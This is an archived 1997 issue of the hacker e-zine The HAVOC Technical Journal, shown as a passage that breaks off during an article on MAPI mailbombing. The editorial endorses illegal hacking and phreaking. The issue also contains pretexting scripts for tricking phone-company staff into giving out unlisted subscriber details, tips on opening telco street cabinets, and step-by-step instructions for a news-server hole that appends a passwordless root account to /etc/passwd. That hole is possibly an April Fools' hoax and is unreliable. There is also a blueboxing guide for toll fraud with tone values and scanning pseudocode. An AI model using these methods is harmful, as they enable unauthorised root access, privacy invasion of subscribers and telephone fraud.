💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › THTJ › thtj09.t… captured on 2022-01-08 at 17:24:33.

View Raw

More Information

⬅️ Previous capture (2021-12-04)

-=-=-=-=-=-=-

������������������������������������������������������������������͸
�The HAVOC Technical Journal                                       ��
�������������������������������������������������������������������ٱ
 ��������������������������������������������������������������������

Vol. 1 | No.9 | April 1st, 1997 | A HAVOC Bell Systems Publication
        "In /dev/null no one can hear you scream." - Redtyde
_____________________________________________________________________________

                --=[The HAVOC Technical Journal Issue 9]=--
              Editorial..............................KungFuFox       
              Social Engineering Your RBOC...........KaiserS
              Subscriber Loop Concentrators..........Optimus
              News passwd hole.......................Scud-O
              International Software Blueboxing......memor
              TEMPEST................................Optimus
              MAPI Mailbombing Part I................Scud-O
              FCC Frequency Allocations..............Keystroke
              1aESS..................................Optimus
              X-Toolz................................lurk3r
              TFTP...................................Scud-O
              The News...............................KungFuFox
              Reader Survey..........................THTJ
              IRC Logs...............................Undernet
              Phonecalls.............................THTJ
              
        "The internet is the antithesis of control.  It redistributes 
        power and undermines control." -Jon Katz, The Netizen
_____________________________________________________________

The HAVOC Technical Journal - Information
- Editor in Chief : Scud-O, foxmulder@worldnet.att.net
- Acting Editor: KungFuFox, mazer@cycat.com
- Submissions Editor: Keystroke, keystroke@thepentagon.com
- THTJ email address: thtj@juno.com
- THTJ website: www.geocities.com/siliconvalley/8805
- THTJ mailing address: PO BOX 448 Sykesville, MD 21784 

  The HAVOC Technical Journal Vol. 1, No.9, April 1st, 1997.  
  A HAVOC Bell Systems Publication.  Contents Copyright (�) 
  1997 HAVOC Bell Systems Publishing.  All Rights Reserved.  
  No part of this publication may be reproduced in whole or 
  in part without the expressed written consent of HAVOC 
  Bell Systems Publishing.  [No copying THTJ, damnit.]
  
  The HAVOC Technical Journal does in no way endorse the 
  illicit use of computers, computer networks, and 
  telecommunications networks, nor is it to be held liable 
  for any adverse results of pursuing such activities.
  [Actually, to tell you the honest to goodness truth, we      
  do endorse that stuff.  We just don't wanna get in trouble 
  if you try it for yourself and something goes wrong.]

        "We're building a wired world, but all those wires are 
        crossed. We've had a lot of warnings. Pretty soon, we're 
        going to start having disasters. It's time we started looking 
        harder at the threats." -Simson Garfinkel, Wired Magazine
_____________________________________________________________
                                 
                                 ---------------
                                --=[Editorial]=--
                              Written by KungFuFox
                                 ---------------
     
     When I think about the electronic underground out there, about the warez
traders, the phreaks, hackers, crackers, anarchists, and all the others, I 
see a buncha people who enjoy what they're doing, with good reason.  You all
have your reasons for residing in the underground community, even if they're
really naughty reasons.  One thing that all of you share [besides 0-day 
warez, k0dez, toenz, phone numbers, card numbers, payphones, toilets, hotel
rooms,... er, I'm getting off track here] is what I'll call the big picture;
it's us against them.  
     Right about now, you're probably thinking that I'm nuttier than a payday 
candybar, or you may be wanting to know who 'they' are.  Yes, I am nuttier, 
but anyways, that 'us against them' thing is an old cliche, but I'm not a 
genius so I used it.  This simple equation should adequately illustrate who 
'they' are: they = evil corporations in the sky.  
     For me, the word corporation conjures up images of an old man sitting at a 
big desk on the top floor of a skyscraper.  He's probably staring at some 
newspaper's stocks & bonds page, and laughing at all the profits that his big 
evil corporation is raking in, but my imagination isn't that vivid, so I 
can't be sure what he's doing, maybe he's molesting a napkin, I don't know.  
Back to my story...
     That old man isn't interested in how good the customers feel about his 
corporation's products, and that's not just because he's old, lots of middle 
aged people have the same problem he's got, and it can't be cured by a 12 
step program, like alzhiemers or redbox addiction.  His problem is greed, and
it's cost him his status as a philanthropist, but who really cares?
                                  *WARNING*
[If you are a faint hearted retard, the below statement may be lethal.  All
personal injury claims may be sent to Bell Communications Research Inc., 
Courtesy of HAVOC Bell Systems, 445 South Street, Morristown, NJ, 07960.]

     The corporate world of the 20th century isn't about ethics, not good 
business, it's all about money. [shocking!] There aren't any real political 
empires out there anymore, because imperialism was deemed unethical by the 
United States, and we're all well aware that the United States is the most 
ethical place in the world, right?  So naturally something has got to replace 
the power that political empires used to have, and voila; we get corporate 
imperialism.  
     If you can't control things with an army, why not just take over wide 
areas of the economy by owning and producing everything that people buy?  Is 
that what YOU were thinking?  Right!  So the old man's army of accountants,
and marketers, and productions staff, and jackoffs, and asshole managers, and
expert lawyers, and enslaved mexican laborers are all set to work building
this empire that that old man wants so bad.  It's not as simple as that, but 
I just recently found out that not all of our readers are economists, which 
really bummed me out.
     What has replaced political imperialism is corporate imperialism, and 
instead of soldiers being sacrificed in the name of territorial expansion, 
it's consumers being sacrificed in the name of higher profits.  Now being the
noble protectors of consumer freedom that we members of the electronic 
underground are, we've got to do something, right?  Well little do you know,
you've probably already helped the cause.
     All attempts at conquering a group of people, may they be military or 
economic, are met with resistance, and we are that resistance.
We each play an important role in this war against corporate imperialism, and 
we all contribute to the well being of our fellow electronic citizen, whether 
we realise it, or not.
     The warez traders slow unfair software company profiteering. Phreaks 
bypass the ridiculous pricing system of the phone company.  Hackers free 
information for the electronic community.  Crackers break down the walls that
have been erected for the purpose of profit.  And anarchists keep 
corporations from going about their business as usual.  
     It isn't about who wins or loses, it's how you play the game, right? 
Well upsetting as it may be, the corporations are cheating, and winning.  We 
are the liberators, the equalizers in a society polarized by gluttonous 
profiteering.  Without us, the world would not be a better place, it could 
only be worse, and things would basically suck.  
     If you phear the media, because they said we're bad guys, pay close 
attention:  the media is owned by corporations, so they say what that old man
at the top of the skyscraper wants them to say.  Nothing you see on the news
is pure unadulterated goods, because that wouldn't be prudent.   Well, the 
real reason isn't about prudence, I made that up.  It IS about making certain
aspects of life look good, and others look bad.  That's why that old man 
always makes himself look swell, and blames us evil hacker types for ruining 
his honest business practices.
     Unbelievable as it may be, they phear us.  We're what stands in the way 
of infinite profits, and wouldn't you know it, that pisses them off.  They 
phear because they don't know who we are, unless they're luck enough to catch
us, which isn't as often as it may seem.  None of those old men, or anyone 
that works for them, will ever meet you, or know your real names, and yet you 
are pheared.  The next time you're hacking a shell, or phreaking your 
grandma, or insulting an OCI operator, or just tradin' some warez, think 
about who you're hurting, it's not the little guys, they don't have to pay 
the bills if they don't want to; it's that evil old man.  If you have a moral
problem hurting old men, just replace the words 'old man' with your favorite
corporate executive.  I've provided a few examples:  Steve Case, Bill Gates,
Michael Eisner, or even Bill Clinton, since he rips us off anyway.
     This editorial is a reminder for those of you who may feel wary of 
breaking the law, or doing something 'wrong'.  Nothing you do is wrong, so 
long as it's not against a moral opponent, or some innocent bystander who 
didn't piss you off or give you a good reason like 'he looked stupid'.  At 
least justify it, so when the judge asks you what the hell you were thinking
when you pranked the mayor at 3am and insulted his wife's obesity, you can 
tell him that you were just trying to offer some constructive criticism.  
     At the same time, you shouldn't feel as though the hacker devil will 
strike you down if you don't help out the cause and fight corporations or 
something, because that's not why you got into H/P/C/V/A in the first place.
You got into it because it was fun, or a challenge, or some other real 
creative reason.  Maybe you wanted to go somewhere that you weren't supposed 
to go, or maybe it was just about taking risks (and not getting caught).  
     Don't hesitate to admit you don't give a shit about the big picture, 
because the big picture is boring and stupid, and you just want k0dez, right?  
I'll end this by thanking Scud-O for giving me the opportunity to edit this 
magazine, and may it live long and prosper.  To all of you readers, hopefully 
you'll come out of this experience with some info that you can use in all of 
your underground adventures, and maybe you'll enjoy reading it at the same 
time.  [If you haven't noticed already, I made a few format changes, so don't 
panic... this is the same magazine.]

     All questions, comments, and good stories may be emailed to me at:
                                                             mazer@cycat.com

        "...there is no scenario that I can see where a system-wide 
        failure of networks would occur due to the internet." 
        -Tim Harmsen, CEO of Digital Vision Communications
_____________________________________________________________
                      
                      ----------------------------------
                     --=[Social Engineering Your RBOC]=--
                              Written by KaiserS
                      ----------------------------------

There are several areas that can be included, or described as "phreaking", in
this article, I will discuss some basics of social engineering, perhaps one 
of the best ways to accomplish large tasks in a small amount of time (without 
hacking, and jailtime).  For those of you who do not know what social 
engineering is, let me give you a brief rundown...

Social engineering involves taking on the identity of, in this case a bell 
employee, in order to make yourself appear to be an inside bell employee, and 
get information that is not publicly available, or, in extreme cases, 
add/move/change service, or disconnect service altogether.  
One of the best things to have when you begin is not knowledge, but rather, a 
deep radio voice...you need to sound like you are "ON AIR" (it makes the bell 
ladies that work the desk jobs swoon)....
Well...enough with the intro...

Social engineering unlisted name/address info from a telephone number only, 
or, the unlisted telephone number from name and address.
FIRST!
You need to have a technical number like the ICSC/ICMC, call information, and 
ask for REPAIR...then call repair, and say that you have a private line 
circuit that is down, and you need the IC repair number...
Once you have that number, you are homefree!
Call the IC Repair number, and act like you have reached the wrong number:
<YOU> Hello? what center have I reached??
<BELL> The interexchange carrier maintenance center (ICMC)
<YOU> OH! I am sorry, would you please transfer me to MLAC, or the LDMC, and 
give me the number before you do in case I drop off.
<BELL> Sure, (searching through a phonelist) (they may have it 
  listed under FACS) I cant find it...
<YOU> Well, I need to speak to someone who works FACS, or PREMIS
<BELL> Ah, here it is...
I will not be giving out those numbers in this article...if you 
  cannot get this far...well:)
Once you have MLAC, or the LDMC...
Call them!

Getting unlisted address/name info from a telephone number...
<YOU> Hi, this is Dan (any name) at the frame of the ANYTOWN01 (usually it 
will be "the town the # is in", and "01, 02, 03, 11, or, 12, i.e., 
Garrison11)
<YOU> I need you to go into FACS, and pull 200 555-1234
<BELL> OK, what do you need?
<YOU> can you pull the address, and binding post information??
<BELL> Sure...
she will give you the address, and several long, hyphenated numbers...these 
designate where the pair s located in the terminal (b-box)
<YOU> Great, do you have SORD??
<BELL> Yes.
<YOU> Can you pull the subscriber name?
<BELL> Yes, I see it listed as : Joe Blow...or whatever:)
<YOU> thank you, have a good day.

Getting unlisted number/numbers from an address...
Call MLAC again...
<YOU> Hi, this is Dan (any name) at the frame of the ANYTOWN01
<YOU> I need you to go into PREMIS, and pull 123 Main Street, Anytown USA.
<BELL> OK, what information do you need?
<YOU> I need all lines terminated at that PREM LOC.
<BELL> OK, I see two lines terminated there, they are...(she will give you 
the telephone numbers)
<YOU> Thank you, and have a good day...

Now, I will explain some of the terminology I used:
MLAC = Mechanized Loop Assignment Center
LDMC = Loop Distribution and Maintenance Center (same as MLAC)
FACS = Facilities Administration Computer System
PREMIS = Doesn't have a neat acro (that I know of) Maintains records by 
premises info
SORD = Service ORDer system
Well, that's it for this writing...hope this can be put to good use, as this 
is one of the best ways to start out, there are many other thing (neat 
tricks) that can be accomplished through these same centers, but this is a 
start, and will be quite an asset.
_____________________________________________________________

                     -----------------------------------     
                    --=[Subscriber Loop Concentrators]=--     
                              Written by Optimus     
                     -----------------------------------     
     
     The Universal SLC (Subscriber loop concentrator) has two main parts, the 
Central Office Terminal (COT) and the Remote Terminal (RT) commonly connected 
by a t1 digital line or optical fiber connection. The COT and RT are composed 
of four shelves labeled alphabetically. Each shelf has twenty-four channels. 
In an intergrated SLC system, the COT is replaced by the Digital Carrier Line 
Unit (DCLU) in a 5ess or similar switch. A SLC with a Feature Package B (FPB) 
can interface to a SLC COT, DCLU, Subscriber Loop Interface Module (SLIM) and 
a LM12 Multiplex.
     The most comman SLC system is there Series 5. The series 5 is
based on two independant 96-line systems that are packaged into one 5
shelf, dual bank assembely.
     The Bank Control Unit (BCU) and Alarm Display Unit (ADU) monitor
for system failures within the SLC system, and its interface. If someone
goes wrong on either end, the other end is notified via the Alarm Interface 
Unit (AIU). An important thing to mention is that many SLC systems have an 
alarm function called DLR ALM, which was conveinently spelled out on a 51a 
SLC for me as a Door Alarm. The particular 51a had a small round piece of 
metal protruding from the upper right hand corner, which would be held in 
when the door was closed and consequently pop out when the door opened. After 
30 seconds of this metal being out, the DLR ALM light would light. This is 
undocumented in all of the many SLC related manuals I have in my possesion, 
but from logic, when tripped, the ADU on the COT or related interface at the 
CO is probably notified. SLC's are fairly easy to spot, usually stored in a 
51a, 80d or 80e cabinets, or frame mounted within a 16 or 24 foot CEV 
(Controlled Environment Vault), PCH (Pre-cast Concrete Hut) or inside a 
customer's location. 
     The 51a is usually a slate or gray colored cabinet mounted off the 
ground on either a pole or a pedestal. The 51a has two sections that open. 
The front section, the Electronics Section, contains the power shelf, fan 
unit, one dual channel bank which I mentioned earlier (allowing up to 192 
subscriber loops (pots)) and the protection panel (following the phone 
companys usually standard of high power protection). The ADU device is 
usually either a card mounted in the Channel Bank or a seperate unit place on 
top of the fan or power shelfs. The back section, the Battery Section, 
contains power backup equipment and battery's to keep the SLC running in case 
its direct power connection fails or the area has a blackout. These sections 
are designed to only be opened with a common allen wrench with a hole drilled 
down the middle of it, but can commonly be opened with a good pair of 
needle-nose pliers.
     The 80D RT housing is more slender but wider then the 51a usually a dark 
brown color with a white frame. The size of the 80D allows most areas to be 
reacher from either the front or the back. The exception to this is on the 
front you have access to the AC power panel and outlets. Oppisite these on 
the back is the main splice for your cabling, a sort of miniature cable 
vault. It is common to find these equipped with a fiber feed, which replaces 
a channel bank on the back with a fiber mulitplexer allowing only three dual 
channel banks supporting 576 subscriber loops (pots). When not equipped with 
a multiplexer, the 80D contains 4 dual channel banks (768 subscriber loops 
(pots)). I have never opened a 80D, but have been told it takes one of the 
two basic telco keys, a 3/8ths or a 5/16ths hex driver (found on a Can/Cam 
wrench). 80D's are always PAD mounted.
     The 80E is basically an extra large 80D, allowing 8 dual channel banks, 
supporting 1536 subscriber loops (pots) unless fed by a fiber link which, as 
in the 80D, replaces a dual channel bank with a multiplexer which I would 
believe should be the feed of choice for every installation of this system. 
I've never seen one of these, but they must be pretty badass from what I've 
read about them. These are also capable of containing t1 repeater shelves for 
t1 extensions. The 80E is also pad mounted. The battery compartment on the 
80E is kept on the very bottom of the unit. The front and back of the 80E are 
divided into four columns. The front left side contains the AC interface, as 
the back left side is as general in 80 SLC's the splicing area. The rest of 
the back of the 80E is dual channel banks with the exception of an unknown 
device in the upper right hand corner. Probably relating to the lightguide 
equipment opposite it. The two middle columns on the front of the 80E contain 
two dual channel units and the ringing, rectifier and other misc shelfs. The 
right column on the front is where the lightguide (fiber optic feed) 
equipment is kept when using a fiber feed, or another dual channel bank if 
not.
     If you ever get into a CEV or a PCH, the SLC system is arranged much the 
same, just to a larger extent. The PCH's will usually contain 30, 36 or 40 
dual channel banks, depending on the PCH size and the type of feed. The CEV's 
will usually contain 20, 24, 30 or 36 dual channel units depending on the 
same specifications.
     I have more information on other SLC cards and systems if you need
something specific. This information will hopefully give you a general idea 
of what these boxes you see on the sides of the road are and what they do. 
     
Basic Data Encoding
     
     The simplest form of the data transfer method on a digital line is a 
bit. A bit is either a zero or a one, zero being off and one being on. Eight 
bits are comprised into a byte. One byte represents a single digital 
character. An example is the letter "A", which in binary would be "01000001". 
A T1 digital line (also knows as a 1.5, T-1, T-Span, T-Line, DS-1) is a 
digital line capable of transmitting voice, data, video and computer 
information at a rate of 1,544,000 Bits Per Second (BPS) (1.544 Mbps). A 
pulse (also known as a one or a mark) is the electrical postive or negative 
signal sent across a digital line. A No Pulse (also known as a zero or a 
space) is there is no electrical signal present on the digital line.
A Bi-Polar Return To Zero (RZ) also called an AMI, is one of the simplest 
protocols for a T1 line. The electronic signal blips into a postive or 
negative charge, both representing a transmission pulse. Between each 'blip' 
the signal returns to zero voltage for a short period of time, not being long 
enough to be recongized as a Non Pulse Bit (NPB). If the signal stays at zero 
through the allotted time slot, it is then recognized as a NPB transmission.
A logic error or a bit error is when a bit is transmitted in one position and 
recieved in another. For example a one is received where are zero was sent. 
This is common, and brought one the creation of crc checking for the digital 
line. A Bi-Polar Violation (BPV) is when two ones are transmitted 
consecutively on the same side of a zero. Simply put, it is when two positive 
or negative ones are received one after the other, when under normal 
circumstances, the bits would alternate polarity.
After one-hundered and ninety-two prior bits are sent across the twenty-four 
channels of a T1, a framing bit is sent, making it the one-hundred and 
ninety-third bit. This is used to identify the end of a bit segment. So if 
each of the twenty-four channels send eight bits, making a one-hundred 
multiplied by 8000 (the approximate number segments sent per second) gives us 
1,544,000 bps, our T1 line.
B8ZS - Binary Eight Digit Zeroes Substitution. B8ZS allows a T1 subscriber to 
follow T1 Tariff requirements which do not allow fifteen consecetive zero 
bits. B8ZS takes a full 0 byte and changes it to look like "000+-0-+" which 
would be "0011011" without polarity.

Customer Service Unit (CSU) - Equipemnt connected at the customer end of a 
1.5 circuit
Channel Service Unit (CSU) - Save as above
Network Interface Unit (NIU) - Placed on the customer end of a 1.5 circut to 
facilitate testing of the circut.
D-4 Bank - A Multiplexer that combines 24 voice channels into a single 
digital output signal, 1.5mbps
Extended Super Frame (ESF) - One quarter of the bits are used to frame a 
digital transmission.

Digital Service Classifycations:
DS0 - 64 kbps - 1 Voice Circut
DS1/T1 - 1.544 mbps - 24 Voice Circuts
DS1C/T1C - 3.152 mbps - 48 Voice Circuts
DS2/T2 - 6.312 - 96 Voice Circuts
DS3/T3/LT - 44.736 mbps - 4672 Voice Circuts
DS3C/LW - 89.472 mbps - 1344 Voice Circuts
DS4/LW - 274.176 mbps - 4032 Voice Circuts
DS5/FT"G" - 1667 mbps - 24192 Voice Circuts

     Optimus <rewt@null.net>
_____________________________________________________________
                            
                            ----------------------
                           --=[News passwd hole]=--
                              Written by Scud-O
                            ----------------------

     While setting up my news server, i was experimenting, and i have
discovered a very huge hole that will be causing some sysadmins some 
sleepless nights.
        What follows below are the steps to not only read, but access and
append any number of accounts to the /etc/passwd .

1. Set your NNTPSERVER environment variable

     usually, this is set to what ever you or your isp use as the news
     server, anyhow, change it to the localhost name so you are using the
     local server as news host.

     Ex: NNTPSERVER=news.digex.net ; export NNTPSERVER
             would go to
         NNTPSERVER=limbo ; export NNTPSERVER
             since limbo is my local host.

     or you can just modify the /etc/nntpserver if you want to be different

2. Create/ Modify your .newsrc file
        add the follwing 'newsgroup' to the file and keep it as the only one:

                /.etc.passwd

3. Either run trn -r of tin to read the 'news'

        Ex:
                tin -r
                tin 1.2 PL2 [UNIX] (c) Copyright 1991-93 Iain Lea.
                Connecting to limbo...
                Reading news active file...
                Reading attributes file...
                Reading newsgroups file ...

                --- etc ----
                 And you should see your password file, which each line being
                 a different article.

4. Or, better yet, use trn and post an 'article'

     While you are running trn and reading a 'news' article, press f . it
     will then prompt you with:

                Are you starting an unrelated topic? [ynq]

     Well, type y , since otherwise you can REALLY mess up the passwd file!

     Next the news reader will prompt you for the subject and distribution
     Enter to following:

                Subject: ignore no reply
                Distrubution: na

     If you are wondering what the 'ignore no reply' is for, it is so that 
     the server will not mail you back saying the message has been posted,
     which otherwise could point you out to the sysadmin if he views any 
     logs!
     
          The distribution basically tells the servers that this is only
     to be sent to 'na' or North America, this line really doesnt matter,
     but nntp can and will be picky about this.

     Now trn will spit some stuff out at you and you should finnaly get to
     where it asks you which editor to use to edit the message, the default
     should be vi, and if it is not i would change it to vi, unless you wish 
     to use another editor.

     Ex:
          Newsgroups: /.etc.passwd
          Subject:
          Summary:
          Expires:
          Sender:
          Followup-to:
          Distributuion: na
          Organization:
          Keywords:
          Cc:
                        
                    rewtbeer::0:1:i like rewt beer:/home/rewt:/bin/sh

     When you are finished typing this all in, save it with :wq .

     trn will then show you the name and and info about the 'newsgroup' you
     are sneding to:

     Your article's newsgroup:
     /etc.passwd          <nothing should be displayed here>

     Check spelling, Send, Abort, Edit, of List? s

     Type s to send out your article.

     trn will then return to the article you were reading. press q to
     exit and go login to your new shell!

     How it works:
     ^^^^^^^^^^^^^
     Ok, not this may sound kind of crazy, but the nntp stores news
     in a standard directory pattern. This only makes sense, since this is
     the easiest way to do things. now, since you throw in the / in the
     newgroup, nntp moves from its regular directory to the root directory.
     Then with the 'etc' it moves to /etc and with the final 'passwd' nntp
     realizes that this is a file not a directory, and it opens it up for
     writing/reading/appending.
          So anyway, have fun, and next April 1st i hope you will look
     for my article on how the impending sale of Netscape to HAVOC Bell
     Systems may spell certain doom for Microslut.
_____________________________________________________________
                              
                    ---------------------------------------   
                   --=[International Software Blueboxing]=--
                               Written by memor
                    ---------------------------------------

When you don't have any technical skills in electronics, like you don't know 
how to calculate U=RI or when you think AC is Asynchronous Christians, you 
have to use a Software Bluebox... 

That program generates the well known 2600 Hz Tone, KP Tone (Key Pulse), ST 
Tone (Start) and the MF (Multi-Frequencies 700Hz-1100Hz) tones. 

2600 Hz is normally the tone which makes the free call possible.  It's a MF,
composed of two frequencies during a lapse of time.  The old and typical 
tone is..

Tone1     Frequency 1 = 2600Hz
          Frequency 2 = 2400Hz
          Length      = 150ms 
          Delay       = 10ms 

Tone2     Frequency 1 = 2400Hz
          Frequency 2 = 2400Hz
          Length      = 300ms
          Delay       = 10ms

After, you'll have to dial the KP-#Number-ST .. KP enables the 
MultiFrequency Receiver, ST is the tone that means the call is completed.

Well, we never used to seize a french local phone number.. too dangerous, 
or when calling a french local phone number, we have to pay something.
Like I can try to bluebox on (33) 0380293031 , trying to seize the phone 
line, with an old 2600Hz.. But when I dial and complete the call for some 
foreign country (B01xxxxxxxxxC) I will still pay the call...

Me -> (33)0380293031 (an Average of 0.26FF/Min .. US$1==5FF)
but well the (33)0380293031 will pay 
(33)0380293031 -> B01xxxxxxxxxC (a lot of $)
And the other problem is that (33)0380293031 is a Hospital, and the callers
are logged.. France Telcom has enough equipment for using a Bluebox Fraud 
detection, and they use it for protecting French numbers against Fraud 
Attempts and for busting kiddie phreakers.

So I personally use operators numbers, which are free for calling some CCS
(calling card services) in USA, Japan, UK, Austria, Sweden, Finland,...
(like the phone numbers I gave in bif2.txt)

Well I have to scan for finding the 2600Hz tones.. It can be for example:

Coloumbia CCS

Tone1     Frequency 1 = 2650Hz
          Frequency 2 = 2450Hz
          Length      = 170ms
          A delay between those 2 tones.. 
          Delay       = 10ms 

Tone2     Frequency 1 = 2450Hz
          Frequency 2 = 2350Hz
          Length      = 330ms
          Delay       = 10ms
     
and after I dial the Kp-#Number-St
dialing : B01219555555C

and well i'll pay

Me->Coloumbia CCS ... US$0
and Coloumbia CCS will pay
Coloumbia CCS->B01219555555C ... a lot of $

There is a little algorythm for scanning the 2600Hz



F1Interval1 is the Begin Frequencie1 \ Tone1
F2Interval1 is the Begin Frequencie2 / with Lenght1
F1AInterval1 is the Begin Frequencie1\ Tone2
F2AInterval1 is the Begin Frequencie2/ with Lenght3

          
F1Interval2 is the End Frequencie1 \ Tone1
F2Interval2 is the End Frequencie2 / with Lenght2
F1AInterval2 is the End Frequencie1\ Tone2
F2AInterval2 is the End Frequencie2/ with Lenght4


Delay is the delay between the 2 tones.. Default Value is 10ms, but u can 
still change it.



Procedure Scanning(F1interval1,F2interval1,F1interval2,F2interval2,
Delay,F1AInterval1,F2AInterval1,F1AInterval2,F2AInterval2,Lenght1,Lenght2,Lenght3,Lenght4)
Define F1interval1,F2interval2,F1AInterval1,F2AInterval1,Lenght1,Lenght2 Integer
Define F1Ainterval2,F2AInterval2,Lenght3,Lenght4 Integer
Define Delay Integer = 10
Define a,b,c,Testin,FirstCoolTone,SecondCoolTone,FirstCoolLenght,SecondCoolLenght Integer
Define FirstCoolTone1,SecondCoolTone1 Integer

/* It is the scan of the 1st Tone */
ask for &F1interval1,&F1interval2,&F2interval1,&F2interval2,&Lenght1,&Lenght2,&Delay
a=F1interval1
c=F2interval1
a=a-1
c=c-1     
while(c!=F2interval2 and Testin!=1)
c=c+1
     while(a!=F1interval2 and Testin!=1)
     a=a+1
     b=Lenght1
          
     while(b!=Lenght2 and Testin!=1)
     Sound(Voice1,b,a)   
     Sound(Voice2,b,c)        
     ask for a 1/0 in Testin   /*is the Tone seems well.*/
     b=b+1
     EndWhile
     wait(Delay)    
     EndWhile
EndWhile
FirstCoolTone=a
FirstCoolTone1=c
FirstCoolLenght=b
Wait(Delay)
Testin=0

/* It is the scan of the 2nd Tone */
ask for &F1Ainterval1,&F1Ainterval2,&F2Ainterval1,&F2Ainterval2,&Lenght3,&Lenght4,&Delay
a=F1Ainterval1
c=F2Ainterval1
a=a-1
c=c-1     
while(c!=F2Ainterval2 and Testin!=1)
c=c+1
while(a!=F1Ainterval2 and Testin!=1)
a=a+1
b=Lenght3
          
     while(b!=Lenght4 and Testin!=1)
     Sound(Voice1,b,a)   
     Sound(Voice2,b,c)        
     ask for a 1/0 in Testin   /*is the Tone seems well.*/
     b=b+1
     EndWhile
     wait(Delay)    
     EndWhile
EndWhile
SecondCoolTone=a
SecondCoolTone1=c
SecondCoolLenght=b
Wait(Delay)

/*Display The Cools Tones And Time*/
Write(1st cool Tone.. F1: %FirstCoolTone f2: %FirstCoolTone1 lenght: %FirstCoolLenght)
Write(2st cool Tone.. F1: %SecondCoolTone f2: %SecondCoolTone1 lenght: %SecondCoolLenght)

End.


There is a little algorythm for seizing with 2600Hz


F11 is the Begin Frequencie1 \ Tone1
F21 is the Begin Frequencie2 / with Lenght1
F12 is the End Frequencie1 \ Tone1
F22 is the End Frequencie2 / with Lenght2



Procedure Dialing(F11,F21,Lenght1,F12,F22,Lenght2,Delay)
/* Dialing Procedure */
ClearScreen
Write(Dialin')
ask &F11,&F21,&Lenght1,&Delay,&F12,&F22,&Lenght2,&Delay
/*1st Tone*/
Sound(Voice1,Lenght1,F11)
Sound(Voice2,Lenght1,F21)

/*Waitin Delay*/
Wait(Delay)

/*2nd Tone*/
Sound(Voice1,Lenght2,F12)
Sound(Voice2,Lenght2,F22)

/*Waitin Delay*/
Wait(Delay)


How To Bluebox for connecting a network, using a modem.
-------------------------------------------------------

In the first place, you must plug the PhonePlug and the ModemPlug like so..
           ______       _____         _____
           Wall  |     |     |       |     |
           In/Out| /___|Modem| /____ |Phone|
           Phone | \���|Plug | \���� |Plug |
           Line  |     |_____|       |_____|
           ������         |             |
         To The Computer.:'             ':.To The Computer Speakers

You must prepare your Software Bluebox and your fav Terminal in 2 tasks 
(Win3.1x,95,nt + DOS)

Task1:Bluebeep.exe (Msdos (Alt+Tab) )
Task2:Term.exe      (Win3.11)

now.. prepare your modem:
ATZ
OK   

To catch the carrier when you'll have it, the command ATD will be cool, ATD 
is for dialing (D=Dialing) , but ATD alone catch the Modem Carrier.
ATDT3336431515 <- Don't prepare that.. Wrong
ATD            <- Right String

Switch the Task on the BlueBox system, Phone your operator number, seize, 
activate the multi-frequencies receiver with KP , Dial # number in MF , Call 
is completed with ST.

When you heard the beep and the carrier Autoanswer of the targeted modem.. 
for example, call the 3615 Teletel French Network >> Dial : B03336431515C, 
switch the task on your fav terminal and press the Return..

ATZ
OK   
     
ATD
Connect 1200
^A 
Teletel Network 3615
                3614
                3613

^C Nom du service:....................................
_____________________________________________________________     
     
                                 -------------     
                                --=[TEMPEST]=--     
                               Written by Optimus     
                                 -------------     
                     
     For those of you who already know alot about tempest, skip this and 
email me all you know, otherwise, read on... TEMPEST stands for Transient 
Electromagnetic Pulse Standard.  Tempest is a code name the government 
created to define their electromagnetic radiation protection program.  The 
government still stands on the fact that Tempest monitoring does not exist 
although millions of dollars go towards this program and many people have 
proven it to be an actual threat.
     In 1985, Wim van Eck, a dutch scientist, published a paper concerning 
the threats of tempest eavesdropping. This paper caused stirring in many 
government agencies, and it was immediatly classified.  Most tempest 
information remains classified to this day, not being allowed to anyone who 
is not a certified tempest security consultant.  This is the cause for the 
scarce amount of information out there on tempest (sometimes known as van 
eck) monitoring.
     For a device to be TEMPEST certified, that is, approved that it does not 
let out any or a largely unsubstantial amount of Electromagnetic radiation, 
it must comply to NACSIM 5100A.  This document happens to be classified by 
the NSA though so alot of good it does to the normal citizen.
     The basis behind TEMPEST is that everything emits electromagnetic
charges. When the power level behind these charges changes, they emit 
electromagnetic pulses that transmit low level radio waves. The challenge
is to pick up these radio waves and reconstruct them into a form readable
and usable by the reciever.
     This is just a small tidbit of information on TEMPEST. Most of
this information I've learned from TheCodex, a company providing
information on surveilance and couter-survailence. You can find them on
the web at http://www.thecodex.com.  Optimus <rewt@null.net>
_____________________________________________________________
                         
                         -----------------------------
                        --=[MAPI Mailbombing Part I]=--
                               Written by Scud-O
                         -----------------------------

I. Introduction of MAPI
^^^^^^^^^^^^^^^^^^^^^^^^
     Ever since Microslut released the MAPI for Win 3.1, Adding and sending 
mail to and from applications has been a breeze. And with Win95's integration 
of MAPI has only helped it. Just look at your windows 95 desktop, and you 
will see MicroSoft Exchange, probably the most popular mail program for w95. 
Microsoft has also made it a requirement for a program to have some form of 
MAPI to recieve a Windows 95 Logo.
     Anyway, MAPI stands for Messaging Applications Programming Interface.  
It is used by programmers to add basic, and advanced mail capabilities to a
program, and MAPI is part of Microslut's Windows Open Services Architecture
(WOSA), which is basically a set of common APIs for distributed computing.

II. The MAPI APIs & Architecture
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
     There are 3 main MAPI APIs. The first one, Simple MAPI, is the most 
commonly used api, and is the API we will mostly be using. The Common 
Messaging Calls API, (CMC) has also been developed as a platform independant
replacement for MAPI (but so far i dont see the internet moving in hordes to
apody it.) It contains about  10 basic calls for basic messaging. And 
finally, there is the big daddy of them all, The Extended MAPI. It is a large 
API with many calls that are still being developed, and are mainly for 
messaging only apps, like Exchange or a Mail Server.

Figure I
^^^^^^^^
                       Basic MAPI Architechure


 Messaging Aware Apps        Messaging Enabled Apps     Messaging Based Apps
       ^                                ^                       ^
       |                                |                       |
 +-------------------------------------------------------------------------+
 |                                                                         |
 |  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  |
 | |  Simple MAPI          CMC      Extended MAPI     OLE Messaging      | |
 |  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  |
 |                        Messaging Subsystems                             |
 |    +------------------------------------------------------------+       |
 |    |                     Extended MAPI                          |       |
 |    +------------------------------------------------------------+       |
 +-------------------------------------------------------------------------+
     |                            |                              |
     ^                            ^                              ^
 Message Store Provider       Address Book                 Transport
                                 Provider                      Provider

Service Providers
^^^^^^^^^^^^^^^^^
     The service providers are the components of MAPI that collectively
implement MAPI service on a system. The three type are Message Stores, 
Address Book, and Transports.
